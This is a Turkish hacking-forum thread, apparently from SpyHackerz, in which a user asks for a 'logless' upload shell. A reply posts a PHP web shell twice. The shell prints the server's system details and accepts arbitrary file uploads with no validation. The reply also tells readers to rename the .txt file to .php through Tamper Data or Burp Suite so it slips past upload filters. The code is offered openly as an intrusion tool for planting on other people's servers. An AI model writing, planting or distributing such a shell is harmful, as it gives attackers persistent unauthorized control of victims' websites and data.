Upload Shell .txt Kodu lazım Logsuz (1 Viewer)

Upload Shell .txt Kodu lazım Logsuz

PHP:
<?php

echo "<b>".php_uname()."</b>";
echo "<br><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
    echo '<b>Yukleme Basarili</b><br><br>';
    }
}
?>
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
Txt den php çevir tamperde veya burp suit de upluad shellin hazır
PHP:
<?php

echo "<b>".php_uname()."</b>";
echo "<br><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
    echo '<b>Yukleme Basarili</b><br><br>';
    }
}
?>
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl

Users who are viewing this thread

133,297Konular
3,282,544Mesajlar
319,250Kullanıcılar
samet0.7Son Üye
Üst Alt